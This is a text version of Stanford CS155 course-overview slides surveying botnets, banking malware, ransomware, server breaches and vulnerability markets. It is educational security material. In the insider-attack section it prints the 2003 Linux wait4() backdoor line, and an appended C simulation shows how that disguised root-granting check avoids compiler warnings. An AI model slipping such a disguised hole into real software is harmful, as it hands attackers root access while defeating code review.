https://cs155.Stanford.edu
CS155 Computer Security
Course overview
Dan Boneh

The computer security problem
- Lots of buggy software
- Social engineering is very effective
- Money can be made from finding and exploiting vulns:
  1. Marketplace for vulnerabilities
  2. Marketplace for owned machines (pay-per-install, PPI)
  3. Many methods to profit from owned machines

Current state of computer security
[Figure: top 50 products by reported vulnerabilities. Source: https://www.cvedetails.com/top-50-products.php?year=2018]

Vulnerable applications being exploited
[Figure: share of exploits by targeted application: Office, Android, Java, browsers. Source: Kaspersky Security Bulletin 2017]

Introduction: sample attacks

Why own client machines: 1. IP address and bandwidth stealing
- Attacker's goal: look like a random Internet user
- Use the IP address of the infected machine or phone for:
  - Spam (e.g. the Storm botnet). Spamalytics: 1 in 12M pharma spams leads to a purchase; 1 in 260K greeting-card spams leads to an infection
  - Denial of service, sold as a service: 1 hour ($20), 24 hours ($100)
  - Click fraud (e.g. Clickbot.A)

Why own machines: 2. Steal user credentials, run crypto miners
- Keylog banking passwords, web passwords, gaming passwords
- Example: SilentBanker (and many like it), a Man-in-the-Browser (MITB) attack:
  1. User requests the login page
  2. Bank sends the login page
  3. Malware injects JavaScript into the page
  4. When the user submits the login information, it is also sent to the attacker
- A similar mechanism is used by the Zeus botnet
- Lots of financial malware records banking passwords via a keylogger, spreads via spam email and hacked web sites, and maintains access to the PC for future installs (Source: Kaspersky Security Bulletin 2017)

Users attacked: stats
- 300,000 users/month worldwide (Source: Kaspersky Security Bulletin 2015); a worldwide problem

Why own machines: 3. Ransomware
- Example: WannaCry, a worm that spreads via a vuln. in SMB (port 445)
  - Apr. 14, 2017: EternalBlue vuln. released by the ShadowBrokers
  - May 12, 2017: worm detected (about four weeks to weaponize)
[Figure: ransomware in 2017, number of users attacked. Source: Kaspersky Security Bulletin 2017]

Why own machines: 4. Spread to isolated systems
- Example: Stuxnet
  - Windows infection
  - Siemens PCS 7 SCADA control software on Windows
  - Siemens device controller on an isolated network
- More on this later in the course

Server-side attacks
- Data theft: credit card numbers, intellectual property
  - Example: Equifax (July 2017), 143M customers' data impacted; exploited a known vulnerability in Apache Struts (RCE)
  - Many similar (smaller) attacks since 2000
- Political motivation: DNC; Tunisia/Facebook (Feb. 2011); GitHub (Mar. 2015)
- Infect visiting users

Infecting visiting users: Mpack
- PHP-based tools installed on compromised web sites
- Embedded as an iframe on the infected page; infects browsers that visit the site
- Features: a management console provides stats on infection rates
- Sold for several hundred dollars; customer care can be purchased (one-year support contract)
- Impact: 500,000 infected sites (compromised via SQL injection)
- Several defenses, e.g. Google Safe Browsing

Types of data stolen
[Figure: breakdown of data types stolen. Source: California breach notification report, 2015 (covering 2012-2015)]

How companies lose data (Source: California breach notification report, 2016)
- Malware/hacking: 54%
- Lost/stolen laptops: 22%
- Insider error: 17%
- Insider misuse/attack: 7%
- How do we have this data? From mandatory breach notification reports.

Insider attacks: example
- Hidden trap door in Linux (Nov. 2003)
- Allows an attacker to take over a computer
- Practically undetectable change (uncovered via CVS logs)
- Inserted line in wait4():

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

- Looks like a standard error check, but note the single '=' in the second clause: it assigns uid 0 (root) to the calling process and evaluates to 0 (false), so the error is never returned. Any process that calls wait4() with options == (__WCLONE|__WALL) silently becomes root.
- See: http://lwn.net/Articles/57135/
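The following is an added user-space simulation of the wait4() trap door above, not code from the lecture or from the Linux kernel. It reproduces the inserted condition next to the check it pretended to be, using a constructed struct task that holds only a uid; the flag values are the kernel's real __WCLONE/__WALL constants, and a starting uid of 1000 is assumed for the caller.

```c
#include <stdio.h>

/* Flag values copied from the kernel's uapi wait.h; EINVAL is 22 on Linux. */
#define __WALL   0x40000000u
#define __WCLONE 0x80000000u
#define EINVAL   22

/* Constructed stand-in for the kernel's task struct: only the field the backdoor touches. */
struct task {
    unsigned int uid;
};

/* The inserted line as written in 2003: '=' where '==' is expected.
 * (current->uid = 0) stores 0 and evaluates to 0 (false), so retval is never
 * set; the only effect of a call with the magic options is uid := 0 (root). */
int wait4_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the line pretended to be: reject the flag combination for root, change nothing. */
int wait4_check_honest(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one version of the check for a caller with the given uid and return the uid afterwards. */
unsigned int uid_after(int (*check)(struct task *, unsigned int),
                       unsigned int uid_before, unsigned int options)
{
    struct task current = { .uid = uid_before };
    (void)check(&current, options);
    return current.uid;
}

int main(void)
{
    unsigned int magic = __WCLONE | __WALL;
    printf("backdoored, magic options: uid 1000 -> %u\n",
           uid_after(wait4_check_backdoored, 1000, magic));
    printf("backdoored, other options: uid 1000 -> %u\n",
           uid_after(wait4_check_backdoored, 1000, __WALL));
    printf("honest,     magic options: uid 1000 -> %u\n",
           uid_after(wait4_check_honest, 1000, magic));
    return 0;
}
```

Compile this with gcc or clang and -Wall: neither compiler warns, because the extra parentheses around the assignment are exactly what silences -Wparentheses. That is why the line survived a casual read; what caught it in the real event was not a compiler or a test but the commit record, as the slide says.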
Many more examples
- Access to SIPRNet and a CD-RW: 260,000 cables to Wikileaks
- SysAdmin for the city of SF government changed passwords, locking the city out of router access
- Insider logic bomb took down 2,000 UBS servers
- Can security technology help?

Introduction: the marketplace for vulnerabilities

Marketplace for vulnerabilities
- Option 1: bug bounty programs (many)
  - Google Vulnerability Reward Program: up to $31,337
  - Microsoft Bounty Program: up to $100K
  - Apple Bug Bounty program: up to $200K (secure boot firmware)
  - Pwn2Own competition: $15K
- Option 2: Zerodium: up to $2M for iOS, $500K for Android, many others (2019)
- Example: Mozilla
[Figure: Mozilla bug bounty payouts]

Marketplace for vulnerabilities
[Figure: Zerodium payouts by target. RCE: remote code execution; LPE: local privilege escalation; SBX: sandbox escape; RJB: remote jailbreak. Source: Zerodium payouts]

Marketplace for owned machines
- Pay-per-install (PPI) services. PPI operation:
  1. Own the victim's machine
  2. Download and install the client's code (e.g. a spam bot or a keylogger)
  3. Charge the client
- Cost per 1,000 machines: US $100-180; Asia $7-8
- Source: Caballero et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

This course
- Goals:
  - Be aware of exploit techniques
  - Learn to defend against and avoid common exploits
  - Learn to architect secure systems
- Part 1: basics (architecting for security): securing apps, OS, and legacy code; isolation, authentication, and access control
- Part 2: Web security (defending against a web attacker): building robust web sites, understanding the browser security model
- Part 3: network security (defending against a network attacker): monitoring and architecting secure networks
- Part 4: securing mobile applications

Don't try this at home!

Ken Thompson's clever Trojan